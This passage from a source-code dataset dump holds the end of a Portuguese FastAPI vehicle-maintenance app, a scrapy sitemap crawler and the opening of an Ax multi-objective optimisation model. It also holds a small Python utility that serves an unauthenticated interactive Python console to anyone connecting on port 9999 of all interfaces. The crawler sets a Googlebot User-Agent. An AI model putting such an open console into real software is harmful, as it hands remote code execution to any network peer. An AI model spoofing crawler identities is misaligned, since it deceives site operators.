None\r\n\r\n nome_mecanico: str\r\n nome_cliente: str\r\n \r\n veiculo: dict\r\n \r\n problema: str\r\n\r\n if data_hora_fim_manutencao == None and data_hora_inicio_manutencao == None: # If start and end are both \"None\", the status becomes \"Pendente\"\r\n __variavel_status = 'Pendente'\r\n\r\n elif data_hora_fim_manutencao != None: # If dh_fim_manutencao is not None, the status becomes \"Concluído\"\r\n __variavel_status = 'Concluído'\r\n\r\n elif data_hora_inicio_manutencao != None: # If dh_inicio_manutencao is not \"None\", the status becomes \"Em progresso\"\r\n __variavel_status = 'Em progresso'\r\n \r\n # Variable set automatically\r\n status: str = __variavel_status # One of \"Em aberto\", \"Em progresso\", \"Concluído\"\r\n \r\n\r\ndef atualizacao_status(registro: Manutencao):\r\n\r\n '''\r\n Function that refreshes the status of a record after it has been updated.\r\n\r\n parameters:\r\n\r\n registro : Manutencao-typed variable holding the record that needs to be updated.\r\n '''\r\n\r\n if registro.data_hora_fim_manutencao == None and registro.data_hora_inicio_manutencao == None: # If start and end are both \"None\", the 
status becomes \"Pendente\"\r\n registro.status = 'Pendente'\r\n\r\n elif registro.data_hora_fim_manutencao != None: # If dh_fim_manutencao is not None, the status becomes \"Concluído\"\r\n registro.status = 'Concluído'\r\n\r\n elif registro.data_hora_inicio_manutencao != None: # If dh_inicio_manutencao is not \"None\", the status becomes \"Em progresso\"\r\n registro.status = 'Em progresso'\r\n\r\ndef atualizacao_arm_veiculos_manutencao(arm_veiculos_manutencao: List[dict], lista_manutencoes: List[Manutencao]):\r\n\r\n '''\r\n Function that refreshes the list of vehicles under maintenance.\r\n\r\n parameters:\r\n\r\n arm_veiculos_manutencao : List of vehicles under maintenance that will be updated.\r\n lista_manutencoes : List used to perform the update.\r\n '''\r\n\r\n veiculos_manutencoes_em_progresso = []\r\n for registro in lista_manutencoes: # For each record in lista_manutencoes\r\n\r\n if registro.status == 'Em progresso': # If the record status equals \"Em progresso\"\r\n \r\n veiculos_manutencoes_em_progresso.append(registro.veiculo) # Append the record's vehicle to the list of maintenances in progress\r\n print(registro.veiculo, registro.status, '\\n', veiculos_manutencoes_em_progresso)\r\n\r\n arm_veiculos_manutencao[:] = veiculos_manutencoes_em_progresso[:] # Update the list with the vehicles whose maintenance is in progress\r\n\r\n\r\n# Naming convention: variables with the \"arm\" prefix are used to store the data\r\narm_manutencoes: List[Manutencao] = [] # List that will store \"Manutencao\" objects, initialized empty\r\narm_veiculos_em_manutencao: List[dict] = [] # List that will store vehicle dictionaries, initialized empty\r\n\r\n\r\n# GET methods\r\n# /get_manutencao : Gets the scheduled maintenance records.\r\n# /get_veiculos_em_manutencao : Gets the vehicles whose maintenance status is \"Em progresso\"\r\n\r\n@app.get('/') # Root (home) route\r\ndef home():\r\n return {'message': 'Executado com sucesso. 
Insira uma rota.'}\r\n\r\n\r\n@app.get('/get_manutencao')\r\ndef get_manutencao(request: Request):\r\n return arm_manutencoes\r\n\r\n@app.get('/get_veiculos_em_manutencao')\r\ndef get_veiculos_em_manutencao():\r\n return arm_veiculos_em_manutencao\r\n\r\n\r\n# POST methods (data insertion)\r\n# /create_manutencao : Creates a maintenance record\r\n# /create_veiculo : Creates a record with the vehicle data (plate, client (owner), etc)\r\n\r\n@app.post('/create_manutencao')\r\nasync def create_manutencao(request: Request):\r\n\r\n body = json.loads( await request.body() )\r\n\r\n manutencao = Manutencao(\r\n \r\n id_manutencao = str(uuid4()),\r\n\r\n data_hora_criacao_registro = datetime.today().strftime( '%d/%m/%Y %H:%M:%S' ),\r\n\r\n nome_mecanico = body['nome_mecanico'],\r\n nome_cliente = body['nome_cliente'],\r\n \r\n problema = body['problema'],\r\n\r\n veiculo = {\r\n \"nome\": body['nome_veiculo'],\r\n \"placa\": body['placa_veiculo']\r\n }\r\n )\r\n\r\n arm_manutencoes.append( manutencao )\r\n\r\n return {'message': 'Operação executada com sucesso.', 'id_manutencao_criada': manutencao.id_manutencao}\r\n\r\n\r\n# PUT methods\r\n# /update_dh_inicio_manutencao : Updates the maintenance start date and time \r\n# /update_dh_fim_manutencao : Updates the maintenance end date and time\r\n# /update_dh_chegada_veiculo : Updates the vehicle arrival date and time\r\n\r\n@app.put('/update_inicio_manutencao')\r\nasync def update_inicio_manutencao(request: Request):\r\n\r\n body = json.loads( await request.body() )\r\n\r\n for registro in arm_manutencoes: # For each record in the arm_manutencoes list\r\n\r\n if registro.id_manutencao == body['id_manutencao']: # If id_manutencao matches the id in the request\r\n \r\n registro.data_hora_inicio_manutencao = body['data_hora_inicio_manutencao'] # Update the record's timestamp\r\n\r\n atualizacao_status( registro ) # Refreshing the record's status\r\n\r\n atualizacao_arm_veiculos_manutencao( arm_veiculos_em_manutencao, arm_manutencoes ) # Refreshing the vehicles under maintenance\r\n\r\n return {'message': 'Operação executada com sucesso.'} # Reporting that the operation succeeded\r\n \r\n return {'message': 'ID não encontrado.'} # If the ID is not found, return \"ID não encontrado.\"\r\n\r\n \r\n\r\n\r\n@app.put('/update_fim_manutencao')\r\nasync def update_fim_manutencao(request: Request):\r\n\r\n body = json.loads( await request.body() )\r\n\r\n for registro in arm_manutencoes: # For each record in the arm_manutencoes list\r\n\r\n if registro.id_manutencao == body['id_manutencao']: # If the record's id matches the id in the request\r\n\r\n registro.data_hora_fim_manutencao = body['data_hora_fim_manutencao'] # Update the record's timestamp\r\n\r\n atualizacao_status( registro ) # Refreshing the record's status\r\n\r\n atualizacao_arm_veiculos_manutencao( arm_veiculos_em_manutencao, arm_manutencoes ) # Refreshing the vehicles under maintenance\r\n \r\n return {'message': 'Operação executada com sucesso.'} # Reporting that the operation succeeded\r\n \r\n return {'message': 'ID não encontrado.'} # If the ID is not found, return \"ID não encontrado.\"\r\n \r\n\r\n@app.put('/update_chegada_veiculo')\r\nasync def update_dh_chegada_veiculo(request: Request):\r\n\r\n body = json.loads( await request.body() )\r\n\r\n for registro in arm_manutencoes: # For each record in the arm_manutencoes list\r\n\r\n if registro.id_manutencao == body['id_manutencao']: # If the record's id matches the id in the 
request\r\n\r\n registro.data_hora_chegada_veiculo = body['data_hora_chegada_veiculo'] # Update the record's timestamp\r\n\r\n atualizacao_status( registro ) # Refreshing the record's status\r\n\r\n return {'message': 'Operação executada com sucesso.'} # Reporting that the operation succeeded\r\n \r\n return {'message': 'ID não encontrado.'} # If the id is not found, return \"ID não encontrado.\"\r\n \r\n\r\n# DELETE methods\r\n# /delete_manutencao : Deletes a maintenance record.\r\n\r\n@app.delete('/delete_manutencao')\r\nasync def delete_manutencao(request: Request):\r\n\r\n body = json.loads( await request.body() )\r\n\r\n for registro in arm_manutencoes: # For each record in the arm_manutencoes list\r\n \r\n if registro.id_manutencao == body['id_manutencao']: # If the record's id matches the id in the request\r\n \r\n if registro.status != 'Concluído': # If the status is not \"Concluído\"\r\n\r\n arm_manutencoes.remove( registro ) # Then remove the record from the arm_manutencoes list\r\n\r\n atualizacao_arm_veiculos_manutencao(arm_veiculos_em_manutencao, arm_manutencoes) # Refreshing the vehicles under maintenance\r\n\r\n return {'message': 'Operação executada com sucesso.'} # Reporting that the operation was executed\r\n \r\n # If the status is \"Concluído\", report that the operation could not be executed\r\n return {'message': f'Operação não pôde ser executada. Status da manutenção: {registro.status}'}\r\n \r\n return {'message': 'ID não encontrado.'} # If the ID is not found, return \"ID não encontrado.\"","repo_name":"guilhermyandrade/Desenvolvimento-WEB","sub_path":"Atividade 1 - 2B/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9622,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33677717903","text":"import sys\nfrom six.moves import socketserver\nfrom code import InteractiveConsole\n\ninterpreter_globals = {}\n\n\nclass InteractiveServer(socketserver.BaseRequestHandler):\n def handle(self):\n global interpreter_globals\n\n file = self.request.makefile()\n shell = Shell(file, locals=interpreter_globals)\n try:\n shell.interact()\n except SystemExit:\n pass\n\n\nclass Shell(InteractiveConsole):\n def __init__(self, file, *args, **kwargs):\n self.file = sys.stdout = file\n InteractiveConsole.__init__(self, *args, **kwargs)\n return\n\n def write(self, data):\n self.file.write(data)\n self.file.flush()\n\n def raw_input(self, prompt=\"\"):\n self.write(prompt)\n return self.file.readline()\n\n\ndef interact(address=(\"0.0.0.0\", 9999)):\n server = socketserver.TCPServer(address, InteractiveServer)\n server.serve_forever()\n\n\nport = 9999\nif __name__ == '__main__': # pragma: no cover\n if len(sys.argv) > 1:\n port = int(sys.argv[1])\n interact((\"0.0.0.0\", port))\n","repo_name":"bbc/nmos-common","sub_path":"nmoscommon/InteractiveServer.py","file_name":"InteractiveServer.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"20656643893","text":"from models import URL\n\nfrom categorizer import Categorizer\nfrom finalizer import finalizer\nfrom formatter import formatter\nfrom tokenizer import Tokenizer\n\n\nfrom mongoengine import connect\nimport re\nfrom multiprocessing import Process, Queue\nimport scrapy.crawler as crawler\nimport uuid\nfrom scrapy import signals\nimport shutil\nfrom scrapy.utils.gz import gunzip, gzip_magic_number\nfrom scrapy.utils.sitemap import 
Sitemap, sitemap_urls_from_robots\nfrom scrapy.http import Request, XmlResponse\nfrom scrapy.spiders import Spider\nfrom bson.objectid import ObjectId\nfrom langdetect import detect\nimport xml.etree.ElementTree as ET\nfrom urllib.parse import urljoin\nfrom urllib.parse import urlparse\nimport pickle\nimport pprint\nimport os\nimport base64\nimport scrapy\nimport simplejson as json\nfrom scrapy.crawler import CrawlerProcess\nfrom scrapy.utils.project import get_project_settings\nfrom scrapy.selector import Selector\nfrom twisted.internet import reactor\nfrom scrapy.crawler import CrawlerRunner\nfrom scrapy.utils.log import configure_logging\n\nerror_urls = []\n\n#from janome.tokenizer import Tokenizer\ntry:\n    import nltk.data\nexcept:\n    import imp\n    import sys\n    sys.modules[\"sqlite\"] = imp.new_module(\"sqlite\")\n    sys.modules[\"sqlite3.dbapi2\"] = imp.new_module(\"sqlite.dbapi2\")\n    import nltk\n\n    import nltk.data\n\n\ndef output_pickle(dic, filename):\n    output = open(filename + '.pkl', 'wb')  # pickle requires a binary-mode file\n    pickle.dump(dic, output)\n    output.close()\n\n\ndef pp(obj):\n    pp = pprint.PrettyPrinter(indent=4, width=160)\n    str = pp.pformat(obj)\n    return re.sub(r\"\\\\u([0-9a-f]{4})\", lambda x: chr(int(\"0x\"+x.group(1), 16)), str)\n\n\ndef load_pickle(filename):\n    pkl_file = open(filename, 'rb')  # load the requested pickle file in binary mode\n    data1 = pickle.load(pkl_file)\n    print(pp(data1))\n    pkl_file.close()\n\n\nregex = re.compile(\n    r'^(?:http|ftp)s?://' # http:// or https://\n    # domain...\n    r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\\.)+(?:[A-Z]{2,6}\\.?|[A-Z0-9-]{2,}\\.?)|'\n    r'localhost|' # localhost...\n    r'\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})' # ...or ip\n    r'(?::\\d+)?' # optional port\n    r'(?:/?|[/?]\\S+)$', re.IGNORECASE)\n\n\nclass Spider(scrapy.spiders.SitemapSpider):\n    name = 'items'\n    custom_settings = {\n        'BOT_NAME': 'stand-alone',\n        'HTTPERROR_ALLOWED_CODES': 'True',\n        'DEFAULT_REQUEST_HEADERS': {\n            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n            'Accept-Language': 'jp',\n            'User-Agent': 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',\n            #'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0'\n        },\n        #'USER_AGENT':'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',\n        #'USER_AGENT':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36',\n        #'REDIRECT_ENABLED':'False',\n        'scrapy.telnet.TelnetConsole': None,\n        'CONCURRENT_ITEMS': os.getenv('SCRAPY_CONCURRENT_ITEMS', '1000'),\n        'CONCURRENT_REQUESTS': os.getenv('SCRAPY_CONCURRENT_REQUESTS', '1000'),\n        'DOWNLOAD_DELAY': float(os.getenv('SCRAPY_DOWNLOAD_DELAY', 0.1)),\n        'DOWNLOAD_MAXSIZE': 1024 * 128 * 64\n        #'CONCURRENT_REQUESTS_PER_DOMAIN': 30,\n        #'CONCURRENT_REQUESTS_PER_IP': 10\n        #'ROBOTSTXT_OBEY': True,\n        #'SPIDER_MIDDLEWARES': {\n        #    'scrapy.downloadermiddlewares.robotstxt.RobotsTxtMiddleware': 543\n        #}\n\n    }\n\n    allowed_domains = []\n\n    @classmethod\n    def from_crawler(cls, crawler, *args, **kwargs):\n        spider = super(Spider, cls).from_crawler(crawler, *args, **kwargs)\n        crawler.signals.connect(spider._handle_error,\n                                signal=signals.spider_error)\n\n        return spider\n\n    def _handle_error(self, failure, response, spider):\n        self.logger.error(\"### HANDLE_ERROR ###\")\n        self.logger.error(failure.type)\n        self.logger.error(failure.getErrorMessage())\n\n    def __init__(self, *args, **kwargs):\n        super(Spider, self).__init__(*args, **kwargs)\n        config = kwargs.get('config')\n        self.config = config\n        self.kwargs = 
kwargs.get('kwargs')\n\n self.entry_url = kwargs.get('entry_url')\n self.document_xpath = kwargs.get('document_xpath')\n self.image_xpath = kwargs.get('image_xpath')\n self.allow_rule = kwargs.get('allow_rule')\n self.deny_rule = kwargs.get('deny_rule')\n self.page_limit = kwargs.get('page_limit')\n self.request_id = kwargs.get('request_id')\n self.job_id = kwargs.get('job_id')\n self.exclude_reg = kwargs.get('exclude_reg')\n\n self.URL = URL\n\n self.logger.info('document_xpath=%s', self.document_xpath)\n self.logger.info('image_xpath=%s', self.image_xpath)\n self.logger.info('allow_rule=%s', self.allow_rule)\n self.logger.info('deny_rule=%s', self.deny_rule)\n self.logger.info('page_limit=%s', self.page_limit)\n self.logger.info('request_id=%s', self.request_id)\n self.logger.info('exclude_reg=%s', self.exclude_reg)\n\n if self.entry_url is not None:\n if re.match(regex, self.entry_url) is not None:\n domain = urlparse(self.entry_url).netloc\n self.allowed_domains.append(domain)\n else:\n raise Exception\n else:\n raise Exception\n\n self.stored_sitemap = {}\n\n if not os.path.exists('workspace'):\n os.mkdir('workspace')\n if not os.path.exists('workspace/temp'):\n os.mkdir('workspace/temp')\n\n if os.path.isfile('./workspace/temp/store.json'):\n with open('./workspace/temp/store.json', \"r\") as f:\n self.stored_sitemap = json.loads(f.read())\n\n self.enable_page_limit = False\n if self.page_limit >= 0:\n self.enable_page_limit = True\n self.max_requests = self.page_limit\n elif self.page_limit == -1:\n pass\n else:\n raise Exception\n\n self.request_counter = 0\n self.tokenizer = Tokenizer(exclude_reg=self.exclude_reg)\n\n def start_requests(self):\n yield Request(self.entry_url, self._parse_root)\n\n def _errback(self, response):\n url = response.request.url\n if url.endswith('/robots.txt') or url.endswith('/robots.txt/'):\n url = urlparse(url).scheme + \"://\" + \\\n urlparse(url).netloc + \"/sitemap.xml\"\n yield Request(url, self._parse_root, errback=self._errback)\n elif url.endswith('/sitemap.xml'):\n url = urlparse(url).scheme + \"://\" + urlparse(url).netloc\n yield Request(url, self._parse_page, dont_filter=True)\n\n def _parse_root(self, response):\n\n url = response.request.url\n base_url = urlparse(url).scheme + \"://\" + urlparse(url).netloc\n\n if url.endswith('/robots.txt') or url.endswith('/robots.txt/'):\n if \"Sitemap:\" in str(response.body):\n yield Request(url, self._parse_sitemap, dont_filter=True)\n else:\n yield Request(base_url, self._parse_page, dont_filter=True)\n elif url.endswith('/sitemap.xml') or url.endswith('/sitemap') or url.endswith('/sitemap/'):\n yield Request(url, self._parse_sitemap, dont_filter=True)\n else:\n expect_url = base_url + \"/robots.txt\"\n yield Request(expect_url, self._parse_root, errback=self._errback)\n\n def _get_sitemap_body(self, response):\n \"\"\"Return the sitemap body contained in the given response,\n or None if the response is not a sitemap.\n \"\"\"\n if isinstance(response, XmlResponse):\n return response.body\n elif gzip_magic_number(response):\n return gunzip(response.body)\n\n elif response.url.endswith('.xml') or response.url.endswith('.xml.gz'):\n return response.body\n\n try:\n root = ET.fromstring(response.body)\n return response.body\n except:\n pass\n\n def _check_lastmod(self, d):\n\n if not d[\"loc\"] in self.stored_sitemap:\n return True\n\n if not \"lastmod\" in self.stored_sitemap[d[\"loc\"]]:\n return True\n\n return False\n\n def _iterloc(self, it, alt=False):\n for d in it:\n if not \"loc\" in d:\n 
continue  # entries without a 'loc' cannot be yielded as (loc, lastmod) pairs\n            elif not \"lastmod\" in d:\n                yield d['loc'], None\n            elif self._check_lastmod(d):\n                yield d['loc'], d[\"lastmod\"]\n\n            if alt and 'alternate' in d:\n                for l in d['alternate']:\n                    yield l, None\n\n    scaned_dict = []\n\n    def _parse_page(self, response):\n        sel = Selector(response)\n        links = sel.xpath('//a/@href').extract()\n        parsed = urlparse(response.request.url)\n\n        for link in links:\n\n            if link.startswith(\"//\"):\n                link = parsed.scheme + \"://\" + parsed.netloc + link[1:]\n            elif link.startswith(\"/\"):\n                link = parsed.scheme + \"://\" + parsed.netloc + link\n            elif not parsed.netloc == urlparse(link).netloc:\n                self.logger.info('###OUTDOMAIN_URL=%s', (link))\n                continue\n\n            if link in self.scaned_dict:\n                continue\n\n            for r, c in self._cbs:\n                if self.enable_page_limit and self.request_counter >= self.max_requests:\n                    return\n                if not self._filter(link):\n                    self.request_counter += 0.2\n                    break\n                self.request_counter += 1\n                request = Request(link, callback=c)\n                request.meta['lastmod'] = None\n                self.scaned_dict.append(link)  # record the link itself so the seen-check above can match it\n                yield request\n                break\n\n    def _parse_sitemap(self, response):\n\n        if response.url.endswith('/robots.txt'):\n\n            for url in sitemap_urls_from_robots(response.text, base_url=response.url):\n                yield Request(url, callback=self._parse_sitemap)\n\n        else:\n            body = self._get_sitemap_body(response)\n            if body is None:\n                return\n\n            s = Sitemap(body)\n            it = self.sitemap_filter(s)\n\n            if s.type == 'sitemapindex':\n                for loc, lastmod in self._iterloc(it, self.sitemap_alternate_links):\n                    if any(x.search(loc) for x in self._follow):\n                        request = Request(loc, callback=self._parse_sitemap)\n                        request.meta['lastmod'] = lastmod\n                        yield request\n            elif s.type == 'urlset':\n                for loc, lastmod in self._iterloc(it, self.sitemap_alternate_links):\n                    for r, c in self._cbs:\n                        if r.search(loc):\n                            if self.enable_page_limit and self.request_counter >= self.max_requests:\n                                return\n                            if not self._filter(loc):\n                                self.request_counter += 0.2\n                                break\n                            self.request_counter += 1\n                            request = Request(loc, callback=c)\n                            request.meta['lastmod'] = lastmod\n                            yield request\n                            break\n\n    def _filter(self, url):\n        domain = urlparse(url).netloc\n        if not domain in self.allowed_domains:\n            return False\n\n        if self.allow_rule:\n            if not re.search(self.allow_rule, url):\n                self.logger.info('DENY=%s', url)\n                return False\n\n        if self.deny_rule:\n            if re.search(self.deny_rule, url):\n                self.logger.info('DENY=%s', url)\n                return False\n        self.logger.info('ALLOW=%s', url)\n\n        return True\n\n    def closed(self, reason):\n\n        #self.logger.info('REASON=%s',reason)\n\n        scraped = self.URL.objects.filter(requestId=self.request_id)\n\n        store = {}\n        for url in scraped:\n            if len(url.words) > 0:\n                store[url.url] = {}\n                if hasattr(url, \"lastmod\"):\n                    store[url.url][\"lastmod\"] = url.lastmod\n\n        json_store = json.dumps(store, indent=4, sort_keys=True)\n        with open('./workspace/temp/store.json', \"w\") as f:\n            f.write(json_store)\n\n        passage_dir = \"./passages\"\n        if os.path.exists(passage_dir):\n            shutil.rmtree(passage_dir)\n            os.mkdir(passage_dir)\n        else:\n            os.mkdir(passage_dir)\n\n        input_metas = []\n        separated_docs = []\n        for url in scraped:\n            if len(url.words) > 0:\n                separated_docs.append(list(url.words))\n\n                meta = {}\n                meta[\"url\"] = url.url\n                meta[\"title\"] = url.title\n                meta[\"passage\"] = url.passage\n                meta[\"user_meta\"] = url.user_meta\n                if len(url.imageUrls) != 0:\n                    meta[\"img_url\"] = list(url.imageUrls)[0]\n                else:\n                    meta[\"img_url\"] = \"\"\n\n                if not os.path.exists('./passages/'+self.request_id):\n                    
os.mkdir('./passages/'+self.request_id)\n\n stream = url.passage\n stream = \"\\n\" + stream\n stream = stream.encode(\"utf-8\")\n\n passage_file_name = base64.b64encode(\n bytes(url.url.encode(\"utf-8\"))).decode(\"ascii\")\n with open('./passages/{0}/{1}.txt'.format(self.request_id, passage_file_name), mode='wb') as f:\n f.write(stream)\n\n input_metas.append(meta)\n\n json_scraped = scraped.to_json(indent=4, sort_keys=True)\n with open('./workspace/temp/scraped.json', \"w\") as f:\n f.write(json_scraped)\n\n sitemap_url = self.entry_url\n request_id = self.request_id\n\n res = self._create_model(separated_docs, input_metas)\n\n if not os.path.exists('result'):\n os.mkdir('result')\n\n res = finalizer(res)\n\n resj = json.dumps(res, indent=4, sort_keys=True)\n with open('./result/res.json', \"w\") as f:\n f.write(resj)\n\n self.scraped_length = len(scraped)\n self._export(resj)\n\n def _export_error(self):\n return\n\n def _export(self, resj):\n return\n\n def _create_model(self, separated_docs, input_metas):\n cat = Categorizer(separated_docs, input_metas,\n self.entry_url, self.request_id, mode=\"eco\")\n res, all_topics, metas = cat.train(num_topics=len(\n separated_docs), filter_n_most_frequent=0, auto=False)\n\n return res\n\n def _get_image(self, sels, response, allow_outer_domain=False):\n\n image_urls = []\n for img in sels:\n image_url = img.xpath(\"@src\").extract_first()\n data_lazy_src = img.xpath(\"@data-lazy-src\").extract_first()\n if data_lazy_src is not None:\n image_url = data_lazy_src\n\n img_width = img.xpath(\"@width\").extract_first()\n img_height = img.xpath(\"@height\").extract_first()\n\n image = {}\n\n if image_url is not None and len(image_url) > 1:\n image[\"url\"] = urljoin(response.request.url, image_url)\n else:\n continue\n\n if \"base64,\" in image[\"url\"]:\n continue\n\n if img_width is None:\n img_width = 150\n if img_height is None:\n img_height = 150\n\n try:\n image[\"width\"] = float(img_width)\n except:\n image[\"width\"] = 0.1\n try:\n image[\"height\"] = float(img_height)\n except:\n image[\"height\"] = 0.1\n try:\n image[\"src\"] = image_url\n except:\n image[\"src\"] = \"\"\n\n image_urls.append(image)\n\n if len(image_urls) == 0:\n self.logger.info('empty0')\n return image_urls\n\n image_urls = list(filter(\n lambda p: p[\"width\"]/p[\"height\"] > 0.1 and p[\"height\"]/p[\"width\"] > 0.1, image_urls))\n\n if image_urls is None:\n self.logger.info('empty1')\n return []\n\n if not allow_outer_domain:\n image_urls = list(filter(lambda p: urlparse(p[\"url\"]).netloc == urlparse(\n response.request.url).netloc, image_urls))\n\n if image_urls is None:\n self.logger.info('empty2')\n return []\n\n if not list(image_urls):\n self.logger.info('empty3')\n return []\n\n max_one = max(image_urls, key=lambda p: p[\"width\"])\n image_urls = [max_one[\"url\"], ]\n return image_urls\n\n def parse(self, response):\n\n url = response.request.url\n\n domain = urlparse(url).netloc\n if not domain in self.allowed_domains:\n return\n\n lastmod = response.request.meta[\"lastmod\"]\n\n sel = Selector(response)\n\n title = sel.xpath('//title/text()').extract_first()\n\n if self.image_xpath is not None:\n image_urls = self._get_image(\n sel.xpath(self.image_xpath), response, allow_outer_domain=True)\n else:\n image_urls = self._get_image(\n sel.xpath(\"//article//img\"), response, allow_outer_domain=True)\n\n if len(image_urls) == 0:\n image_urls = self._get_image(\n sel.xpath(\"//img\"), response, allow_outer_domain=True)\n\n user_meta = {}\n\n obj = formatter(sel)\n 
#obj = dict()\n        #exec(self.json_format, {\"sel\": sel,\n        #     \"re\": re, \"logger\": self.logger}, obj)\n        user_meta = obj # [\"res\"]\n\n        title = (title.replace('\\n', ''))\n        passage = title + \"\\n\"\n        if self.document_xpath is not None:\n            passageXPath = self.document_xpath\n        else:\n            passageXPath = \"//*[self::h1 or self::h2 or self::h3 or self::h4 or self::h5 or self::h6]/text()|//article//div/text()|//article//p/text()\"\n        passage_word_list = sel.xpath(passageXPath).extract()\n\n        regex = r\".+\"\n        for p in passage_word_list:\n            pp = (p.replace('\\n', ''))\n            pp = (pp.replace(' ', ''))\n            passage += \" \" + pp\n\n        lang = detect(passage)\n\n        if lang == 'ja':\n            words = self.molph_mecab(passage)\n        else:\n            words = self.molph_nltk(passage)\n\n        json_words = json.dumps(words)\n\n        if True:\n            if len(words) > 0:\n                objectId = ObjectId()\n                molphed = self.URL(url=url)\n                molphed.title = title # one\n                molphed.lang = lang\n                molphed.words = words\n                molphed.words_len = len(words)\n                molphed.imageUrls = image_urls\n                molphed.passage = passage\n                molphed.user_meta = user_meta\n\n                molphed.lastmod = lastmod\n                molphed.requestId = self.request_id\n                molphed.save()\n\n        return\n\n    def molph_mecab(self, line):\n        return self.tokenizer.tokenize(line)\n\n    def molph_nltk(self, line):\n        words = []\n        #print(line)\n        tokens = nltk.word_tokenize(line)\n        taggeds = nltk.pos_tag(tokens)\n        for tagged in taggeds:\n            #print(tagged)\n            w = str(tagged[1])\n            if (w == 'NN' or w == 'NNS' or w == 'NNP' or w == 'NNPS') and len(tagged[0]) > 1:\n                a = tagged[0]\n                words.append(a.lower()) # Lowercase only\n            #if re.search('NN', w):\n            #    a = tagged[0]\n            #    words.append(a)\n        return words\n\n\n#from scrapy.xlib.pydispatch import dispatcher\n\n\nclass ScannerWrapper():\n    def __init__(self, entry_url, document_xpath=None, image_xpath=None, allow_rule=None, deny_rule=None, page_limit=1000, exclude_reg=r\"\\d(年|月|日|時|分|秒)\"):\n\n        self.entry_url = entry_url\n        self.document_xpath = document_xpath\n        self.image_xpath = image_xpath\n        self.allow_rule = allow_rule\n        self.deny_rule = deny_rule\n        self.page_limit = page_limit\n        self.exclude_reg = exclude_reg\n\n        MONGO_ADDR = \"localhost\"\n        MONGO_PORT = 27017\n        MONGO_DB = \"test\"\n        connect(MONGO_DB, host=MONGO_ADDR, port=MONGO_PORT)\n\n        self.request_id = str(uuid.uuid4())\n        self.job_id = str(uuid.uuid4())\n\n    def main(self):\n\n        return self.spy_items()\n        #return self.spy_items_runner()\n\n    def spy_items(self):\n\n        process = CrawlerProcess(get_project_settings())\n\n        process.crawl(Spider,\n                      entry_url=self.entry_url,\n                      document_xpath=self.document_xpath,\n                      image_xpath=self.image_xpath,\n                      allow_rule=self.allow_rule,\n                      deny_rule=self.deny_rule,\n                      page_limit=self.page_limit,\n                      request_id=self.request_id,\n                      job_id=self.job_id,\n                      exclude_reg=self.exclude_reg\n                      )\n\n        process.start()\n        #process.start(stop_after_crawl=False)\n        #process.stop()\n        return\n\n    def spy_items_runner(self):\n\n        self.sitemap_urls = [self.entry_url, ]\n\n        def f(q):\n            try:\n                runner = crawler.CrawlerRunner(get_project_settings())\n                deferred = runner.crawl(Spider,\n                                        entry_url=self.entry_url,\n                                        document_xpath=self.document_xpath,\n                                        image_xpath=self.image_xpath,\n                                        allow_rule=self.allow_rule,\n                                        deny_rule=self.deny_rule,\n                                        page_limit=self.page_limit,\n                                        exclude_reg=self.exclude_reg\n                                        )\n                deferred.addBoth(lambda _: reactor.stop())\n                reactor.run()\n                q.put(None)\n            except Exception as e:\n                q.put(e)\n\n        q = Queue()\n        p = Process(target=f, args=(q,))\n        p.start()\n        result = q.get()\n        p.join()\n\n        if result is not None:\n            raise result\n\n        return \"{}\"\n","repo_name":"makotunes/easy-customizable-scraper","sub_path":"src/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":22516,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"17465518413","text":"from logging import Logger\nfrom typing import Any, Callable, Dict, List, Optional, Tuple\n\nimport torch\nfrom ax.core.search_space import SearchSpaceDigest\nfrom ax.exceptions.core import AxError\nfrom ax.models.torch.botorch import (\n    BotorchModel,\n    get_rounding_func,\n    TBestPointRecommender,\n    TModelConstructor,\n    TModelPredictor,\n    TOptimizer,\n)\nfrom ax.models.torch.botorch_defaults import (\n    get_and_fit_model,\n    recommend_best_observed_point,\n    scipy_optimizer,\n    TAcqfConstructor,\n)\nfrom ax.models.torch.botorch_moo_defaults import (\n    get_qLogNEHVI,\n    infer_objective_thresholds,\n    pareto_frontier_evaluator,\n    scipy_optimizer_list,\n)\nfrom ax.models.torch.frontier_utils import TFrontierEvaluator\nfrom ax.models.torch.utils import (\n    _get_X_pending_and_observed,\n    _to_inequality_constraints,\n    predict_from_model,\n    randomize_objective_weights,\n    subset_model,\n)\nfrom ax.models.torch_base import TorchGenResults, TorchModel, TorchOptConfig\nfrom ax.utils.common.constants import Keys\nfrom ax.utils.common.docutils import copy_doc\nfrom ax.utils.common.logger import get_logger\nfrom ax.utils.common.typeutils import checked_cast, not_none\nfrom botorch.acquisition.acquisition import AcquisitionFunction\nfrom botorch.models.model import Model\nfrom torch import Tensor\n\n\nlogger: Logger = get_logger(__name__)\n\n# pyre-fixme[33]: Aliased annotation cannot contain `Any`.\nTOptimizerList = Callable[\n    [\n        List[AcquisitionFunction],\n        Tensor,\n        Optional[List[Tuple[Tensor, Tensor, float]]],\n        Optional[Dict[int, float]],\n        Optional[Callable[[Tensor], Tensor]],\n        Any,\n    ],\n    Tuple[Tensor, Tensor],\n]\n\n\nclass MultiObjectiveBotorchModel(BotorchModel):\n    r\"\"\"\n    Customizable multi-objective model.\n\n    By default, this uses an Expected Hypervolume Improvement function to find the\n    Pareto frontier of a function with multiple outcomes. 
